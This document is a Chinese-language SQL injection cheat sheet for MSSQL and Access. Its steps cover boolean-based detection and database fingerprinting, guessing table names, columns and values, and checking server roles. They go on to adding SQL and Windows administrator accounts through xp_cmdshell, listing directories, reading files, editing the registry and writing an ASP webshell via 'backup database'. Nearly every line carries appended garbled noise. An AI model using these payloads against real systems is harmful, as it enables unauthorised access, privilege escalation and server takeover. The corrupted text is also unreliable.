1.判断是否有注入;and 1=1 ;and 1=2 xW^<.@�Agm
2.初步判断是否是mssql ;and user>0 Y- w5S�|!�
WF�h!re%Z�
3.注入参数是字符'and [查询条件] and ''=' C( r�?1ma
2Hq!Ys�J4]
4.搜索时没过滤参数的'and [查询条件] and '%25'=' :`uo]�B�"�
c��[;�I\�g
5.判断数据库系统 V�X�- �f~�
0_Y;r{3m�"
;and (select count(*) from sysobjects)>0 mssql _m���n4z�+
��g:*yjj��
;and (select count(*) from msysobjects)>0 access AU7c =
H:?
��[PU�.lRq
]��w'�)~yk
_=cMa'�s��
6.猜数据库 ;and (select Count(*) from [数据库名])>0 M`5^v�0�,C
O�i{j�z�P�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 $U6)k�m4��
T�RQva8�d?
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 KpK'?WhX7^
T[7-�3[w<)
9.(1)猜字段的ascii值(access) *D9QwQ
_|
3��W2��7R�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 sDwSEg>#�B
9E�H%[wf�v
(2)猜字段的ascii值(mssql) V�1Fd�t+�#
�LOOv8'%O8
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �*=ALn�s?y
apYf,"�|9�
10.测试权限结构(mssql) N�(�IUNL��
uH7u4��f1Q
yqAw7GaBN�
|�fa3;8!96
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- $6�0+}B�`m
s�N�N�t0q(
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- AAs&wYp8Yh
SIg=_o�a��
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- #2`tsZ�]=I
&-�&6ARb7o
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- b��_�6j7�7
%f^TZ,�q$�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- rA_e3L@v#[
u'��'�(;U[
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- \�?}ZXKuJj
A�Bx0IdOcI
;and 1=(select IS_MEMBER('db_owner'));-- {�Ji[d.cY
kdv�>Q��Z�
Uyv�FR���@
�le1'r�>E$
11.添加mssql和系统的帐户 s^E��%Uk�m
ANW�a%%\T�
;exec master.dbo.sp_addlogin username;-- �Z3Vi�i�l:
;exec master.dbo.sp_password null,username,password;-- z:acrQwJ?1
)�!�O�Ea]�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 6� .*=1P*?
ty���"���k
;exec master.dbo.xp_cmdshell 'net user username password ���g�~`U�C
^�6obxwVG
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 0�t�<TZa]V
ni3^�J5X�W
;exec master.dbo.xp_cmdshell 'net user username password /add';-- V-)q&cbW]q
�s�bG3,'i)
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ~s
!�+9\Fi
L�dig��/:�
*�V�D-�c�
8�_:jPd!�3
12.(1)遍历目录 z5�P�o�,@W
���C:H9C�
;create table dirs(paths varchar(100), id int) B!9<c9/ P]
dhV��=;'
�
;insert dirs exec master.dbo.xp_dirtree 'c:\' 9�GCxF`O�B
U��oBu0�Rx
;and (select top 1 paths from dirs)>0 F|Ou���5WD
PI�nU�-"gG
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ;Qw>&2�4h[
Wb^Yq��qE
p6�>��3
p
t\'URpa+5%
(2)遍历目录 qQ�^]z8g6P
`L�0}^�|`9
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- }�yX�a�1#3
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 k(V#{�
�YP
8Kv�=Zp,?`
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 |2^cPnv?G&
U@i+XZc�"S
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 K /.� ;N.9
>/-<�,,<\C
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 @m�#�7E4�+
�[NyR�$yD{
^cX);�k�oO
�r"k\G\,�%
13.mssql中的存储过程 �e6,/����i
Ey 4GyA�l�
xp_regenumvalues 注册表根键, 子键 D4[t@*�m>7
Un7jzAvQ�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 M�dCE�p�1Z
\V}?�K0#bt
xp_regread 根键,子键,键值名 �Z�^�s�&]�
-�2bu`oD
`
;exec xp_regread _0�ep�[r��
Y�JF!_kg.
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 `WX @1�]m
-Y�;(y�Ttz
xp_regwrite 根键,子键, 值名, 值类型, 值 >e'6R�ZRLA
@�G^
�l�`%
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ��mD=x3��d
1V����H7�z
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 Bv@N��E2��
1Hk`i���%
xp_regdeletevalue 根键,子键,值名 ^~(�@�QfY�
/+i�U�1m'(
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 yB,�$��4:C
4E<�iIA\�x
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 6�[w_�/�X"
A6pPx1��-&
0�c
/xE<h�
\"�|E8A6/�
14.mssql的backup创建webshell K+2<{�qwh
/� �9^:*,
use model FU��iEayM
~X)Aw�3�}F
create table cmd(str image); #]��cO]
I
�M� �qFuZg
insert into cmd(str) values (''); �)jm}h7�,�
�5Ta<�$�t
backup database model to disk='c:\l.asp'; r��3{�Cu�z
=c�[9:&5Q�
�`�ZC_F!
E
#J#��x,BLI
15.mssql内置函数 /X�9�K���g
#px74Ee�I\
;and (select @@version)>0 获得Windows的版本号 fH}#.�vy�
(V�!��:�6�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �[�x{'NwP?
}f?$QS���F
;and (select user_name())>0 爆当前系统的连接用户 R %a�ed>zo
M4~^tML>Ey
;and (select db_name())>0 得到当前连接的数据库 D!^&*Ia?2�
:�Z3T�yj}4
W;��P8�=q�
�lpv�Z[^�G
16.简洁的webshell �o]u,�<bM$
e�5W 8YNA�
use model W+k S��L{0
#R-l2OO^�]
create table cmd(str image); n��c4Ke�El
#�{-B�`FAQ
insert into cmd(str) values (''); � J!YB�_6b
vz[oy�|{F
backup database model to disk='g:\wwwtest\l.asp';
